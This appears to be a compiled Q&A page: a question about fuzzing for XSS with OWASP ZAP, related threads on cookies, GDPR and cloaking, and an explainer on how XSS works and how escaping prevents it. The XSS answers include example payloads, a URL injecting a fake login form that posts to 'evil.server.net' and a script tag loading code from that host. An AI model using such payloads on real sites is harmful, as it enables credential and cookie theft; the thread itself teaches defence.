Issues in fuzzing parameters on a website and search for cross-site scripting (XSS) vulnerabilities - xss

I am using OWASP's Zed Attack Proxy (ZAP) to fuzz parameters on a website and search for cross-site scripting (XSS) vulnerabilities. After looking at a youtube video "http://www.youtube.com/watch?v=rmbi-VbIK6I", I am trying to implement it, but while fuzzing, I have received only few response as compared to that video. Scripts are not displayed. Above all, how to identify that which script hits by looking at the response code? I am very new to this field. I am posting screenshots to see the difference. Please help me out.
My Output :
Vids Output:

Related

Mediawiki:Cookies in general

I have a general and simple/stupid sounding question about the MediaWiki (MW): Does MW use cookies?
There is not one article nor manual page at all about this topic. Of course the website of MW has a Cookie Statement page (and Wikipedia links to the same) and this tells they use diff. types of cookies and even tracking pixels (another topic you can't find anything about).
If I log in on my fresh installed Wiki and looking for cookies in the meantime, the browser doesn't show me any cookie from my site. But if I log in on Wikipedia et al. cookies were set.
I did a lot of search about this question and if it is possible to control the application of cookies, but couldn't find any (detailed) article. Due to GDPR I would like to understand how it works in MW and not just copy/paste a cookie statement for my wiki visitors.
This is what I've found until now (but didn't helped at all):
Manual:SessionManager and AuthManager
Manual:Configuration Settings
Requests for comment/Survey Cookies/Local Storage on Wikimedia
Extension:CookieWarning
GDPR (General Data Protection Regulation) and MediaWiki software
So if possible, please tell me more than "MW is using cookies."
Thanks in advance :)
Wikis uses cookies. At least the session cookies. But Session cookies are technical needed and you don't need.
Extensions can bring more cookies in. Especially analytic tools set tracking cookies.

YouTube and GDPR compliance for videos embebed on website

I came to know even embedding of youTube videos on website are also affected by GDPR law, even for this we need user consent. There is not much i can find on the internet how to make embedding of youtube videos GDPR compliance and how we can take user consent for this.
After digging for few days i found following link which say how we can use
https://foliovision.com/support/fv-wordpress-flowplayer/requests-and-feedback/youtube-and-gdpr
following link from google allow us to use it in no cookie option but is this compliance with GDPR https://www.youtube-nocookie.com/embed/MjZxCbMQmXg
Is there any easy way of getting user consent for all such as third party tools etc.
I'm currently working with a very similar issue.
The solution I have working so far is like this:
Install Cookie Consent Plugin from https://privacypolicies.com/cookie-consent/ and configure it
Wrap Youtube embeds with this sort of PHP:
if (isset($_COOKIE['cookie_consent_level']) &&
$_COOKIE['cookie_consent_level'] == "targeting-cookies") {
// If we are allowed to use targeting cookies,
// include the Youtube/FB/Google code.
print $youtube_embed_code;
print $google_retargeting_code;
print $facebook_pixel_code;
}
What that provides is code load on second page view (within 12 month window). If your default cookie setting is the most liberal, eg targeting-cookies, then all subsequent page views on your site for that visitor will include the appropriate embeds.
I'm close to getting something working on first page load, after approval is sought, but not quite there yet.
This plugin helped: http://wordpress.org/plugins/youtube-embed-plus/
Improved GDPR compliance options: YouTube no cookie, YouTube API restrictions, GDPR consent mode
To see how it works, without having to first download the plugin, I suggest watching this video: https://www.youtube.com/watch?v=lm_HIic6obw
Basically, there's a "preload" message displayed until the site visitor accepts the YouTube.com connection and cookies.

Cookiewall and content cloaking

To comply with the European cookie law, we should implement cookie wall. But search engines should be able to see and index actual page content not cookie wall.
Searching online I found that many people recommend checking user-agent and feeding actual content for bots and crawlers and show cookie wall for real users. Popular WordPress Cookie wall plugins also implement this way by checking bots & crawlers/real users
My question is: Does google count this as content cloaking and penalize SEO ranking or not? Or is there another way to implement cookie wall without affecting SEO ranking
Cloaking is a search engine optimization (SEO) technique in which the content presented to the search engine spider is different from that presented to the user's browser. This is done by delivering content based on the IP addresses or the User-Agent HTTP header of the user requesting the page.
Cloaking takes a user to other sites than he or she expects by disguising those sites' true content. During cloaking, the search engine spider and the browser are presented with different content for the same Web page. HTTP header information or IP addresses assist in sending the wrong Web pages. Searchers will then access websites that contain information they simply were not seeking, including pornographic sites. Website directories also offer up their share of cloaking techniques.
Many of the larger search engine companies oppose cloaking because it frustrates their users and does not comply with their standards. In the search engine optimization (SEO) industry, cloaking is considered to be a black hat technique that, while used, is frowned on by most legitimate SEO firms and Web publishers. Getting caught cloaking can result in huge penalties from the search engines, including being removed from the index altogether.
So, yeah, this count as cloacking.
Put the cookie disclaimer in an <aside> element. Make sure you initialise this with some internet explorer js code as it's HTML5 only. Google will generally ignore these based on their content, position and it's relevance to the rest of the page.

Parsing __utmz tracking cookie to get referral

I use Google Analytics on my site, and I want to read __umtz cookie to get referring link. I made some research and I wrote such code:
$refer=explode('utmcsr=',$_COOKIE['__utmz']);
if(count($refer)>1) $refer=explode('|',$refer[1]);
$refer=addslashes($refer[0]);
The problem is, this is not always working, sometimes I get junk as result. What I am doing wrong? Maybe someone have a good description of this cookie?
Check my Google Analytics Cookie Parser.
Google Analytics PHP Cookie Parser is a PHP Class that you can use to obtain data from GA cookies such as campaign, source, medium, etc. You can use this parser to get this data on your contact forms or CRM.
Just updated to version 1.2 with minor bugfixes and more info, number of pages viewed in current visit.
You could use $_SERVER['HTTP_REFERER'] to get the Referer.
Overall it is a bad idea to use other's people's cookies to get data unless you know exactly how they work, and when they update, or you use an API that THEY have made available.
Lets say the Google decides to revamp the cookie altogether so that the Referer information isn't available on the cookie, your system would break. It is best to get data directly from your own sources rather than someone else's.

What is the general concept behind XSS?

Cross-site scripting (XSS) is a type
of computer security vulnerability
typically found in web applications
which enable malicious attackers to
inject client-side script into web
pages viewed by other users. An
exploited cross-site scripting
vulnerability can be used by attackers
to bypass access controls such as the
same origin policy. Cross-site
scripting carried out on websites were
roughly 80% of all security
vulnerabilities documented by Symantec
as of 2007.
Okay so does this mean that a hacker crafts some malicious JS/VBscript and delivers it to the unsuspecting victim when visiting a legitimate site which has unescaped inputs?
I mean, I know how SQL injection is done....
I particularly don't understand how JS/VBscript can cause so much damage! I thoguht they are only run within browsers, but apparently the damage ranges from keylogging to cookie stealing and trojans.
Is my understanding of XSS correct? if not, can someone clarify?
How can I prevent XSS from happening on my websites? This seems important; 80% of security vulnerabilities means that it's an extremely common method to compromise computers.
As the answers on how XSS can be malicious are already given, I'll only answer the following question left unanswered:
how can i prevent XSS from happening on my websites ?
As to preventing from XSS, you need to HTML-escape any user-controlled input when they're about to be redisplayed on the page. This includes request headers, request parameters and any stored user-controlled input which is to be served from a database. Especially the <, >, " and ' needs to be escaped, because it can malform the surrounding HTML code where this input is been redisplayed.
Almost any view technolgy provides builtin ways to escape HTML (or XML, that's also sufficient) entities.
In PHP you can do that with htmlspecialchars(). E.g.
<input name="foo" value="<?php echo htmlspecialchars($foo); ?>">
If you need to escape singlequotes with this as well, you'll need to supply the ENT_QUOTES argument, also see the aforelinked PHP documentation.
In JSP you can do that with JSTL <c:out> or fn:escapeXml(). E.g.
<input name="foo" value="<c:out value="${param.foo}" />">
or
<input name="foo" value="${fn:escapeXml(param.foo)}">
Note that you actually don't need to escape XSS during request processing, but only during response processing. Escaping during request processing is not needed and it may malform the user input sooner or later (and as being a site admin you'd also like to know what the user in question has actually entered so that you can take social actions if necessary). With regard to SQL injections, just only escape it during request processing at the moment when the data is about to be persisted in the database.
Straight forward XSS
I find Google has an XSS vulnerability.
I write a script that rewrites a public Google page to look exactly like the actual Google login.
My fake page submits to a third party server, and then redirects back to the real page.
I get google account passwords, users don't realize what happened, Google doesn't know what happened.
XSS as a platform for CSRF (this supposedly actually happened)
Amazon has a CSRF vulnerability where a "always keep me logged in" cookie allows you to flag an entry as offensive.
I find an XSS vulnerability on a high traffic site.
I write a JavaScript that hits up the URLs to mark all books written by gay/lesbian authors on Amazon as offensive.
To Amazon, they are getting valid requests from real browsers with real auth cookies. All the books disappear off the site overnight.
The internet freaks the hell out.
XSS as a platform for Session Fixation attacks
I find an e-commerce site that does not reset their session after a login (like any ASP.NET site), have the ability to pass session id in via query string or via cookie, and stores auth info in the session (pretty common).
I find an XSS vulnerability on a page on that site.
I write a script that sets the session ID to the one I control.
Someone hits that page, and is bumped into my session.
They log in.
I now have the ability to do anything I want as them, including buying products with saved cards.
Those three are the big ones. The problem with XSS, CSRF, and Session Fixation attacks are that they are very, very hard to track down and fix, and are really simple to allow, especially if a developer doesn't know much about them.
i dont get how JS/VBscript can cause so much damage!
Ok. suppose you have a site, and the site is served from http://trusted.server.com/thesite. Let's say this site has a search box, and when you search the url becomes: http://trusted.server.com/thesite?query=somesearchstring.
If the site decides to not process the search string and outputs it in the result, like "You search "somesearchstring" didn't yield any results, then anybody can inject arbitrary html into the site. For example:
http://trusted.server.com/thesite?query=<form action="http://evil.server.net">username: <input name="username"/><br/>password: <input name="pw" type="password"/><br/><input type="sumbit"/></form>
So, in this case, the site will dutifully show a fake login form on the search results page, and if the user submits it, it will send the data to the evil untrusted server. But the user doesn't see that, esp. if the url is really long they will just see the first but, and assume they are dealing with trusted.server.com.
Variations to this include injecting a <script> tag that adds event handlers to the document to track the user's actions, or send the document cookie to the evil server. This way you can hope to bump into sensitive data like login, password, or credit card data. Or you can try to insert a specially styled <iframe> that occupies the entire client window and serves a site that looks like the original but actually originates from evil.server.com. As long as the user is tricked into using the injected content instead of the original, the security's comprompised.
This type of XSS is called reflective and non-persistent. Reflective because the url is "relected" directly in the response, and non-persistent because the actual site is not changed - it just serves as a pass through. Note that something like https offers no protection whatsoever here - the site itself is broken, because it parrots the user input via the query string.
The trick is now to get unsuspecting users to trust any links you give them. For example, you can send them a HTML email and include an attractive looking link which points to the forged url. Or you can perhaps spread it on wikis, forums etc. I am sure you can appreciate how easy it really is - it's just a link, what could go wrong, right?
Sometimes it can be worse. Some sites actually store user-supplied content. Simple example: comments on a blog or threads on a forum. Or it may be more subtle: a user profile page on a social network. If those pages allow arbitrary html, esp. script, and this user-supplied html is stored and reproduced, then everybody that simply visits the page that contains this content is at risk. This is persistent XSS. Now users don't even need to click a link anymore, just visiting is enough. Again the actual attack consists of modifying the page through script in order to capture user data.
Script injection can be blunt, for example, one can insert a complete <script src="http://evil.server.net/script.js"> or it may be subtle: <img src="broken" onerror="...quite elaborate script to dynamically add a script tag..."/>.
As for how to protect yourself: the key is to never output user input. This may be difficult if your site revolves around user-supplied content with markup.
Imagine a web forum. An XSS attack could be that I make a post with some javascript. When you browse to the page, your webpage will load and run the js and do what I say. As you have browsed to the page and most likely are logged in, my javascript will do anything you have privileges to do, such as make a post, delete your posts, insert spam, show a popup etc.
So the real concept with XSS is the script executes in your user context, which is a privilege escalation. You need to be careful that anywhere in your app that receives user input escapes any scripts etc. inside it to ensure that an XSS can't be done.
You have to watch out for secondary attacks. Imagine if I put malicious script into my username. That might go into the website unchecked, and then written back out unchecked but then any page that is viewed with my username on it would actually execute malicious script in your user context.
Escape user input. Don't roll your on code to do this. Check everything going in, and everything coming out.
The XSS attacks' issues are more fishing related. The problem is that a site that a customer trusts might be injected with code that leads to site made by the attacker for certain purpose. Stealing sensitive information, for example.
So, in XSS attacks the intruded do not get into your database and don't mess with it. He is playing with the sense in the customer that this site is safe and every link on it is pointing to a safe location.
This is just the first step of the real attack - to bring the customer in the hostile environment.
I can give you a brief example. If a bank institution puts a shoutbox on their page, for example and they do not prevent me from XSS attack, I can shout "Hey come on this link and enter you passwords and credit card No for a security check!" ... And you know where this link will lead to, right ?
You can prevent the XSS attacks by make sure you don't display anything on your page, that is coming from users' input without escaping html tags. The special characters should be escaped, so that they don't interfere with the markup of your html pages (or whatever technology you use). There are lot of libraries that provide this, including Microsoft AntiXSS library.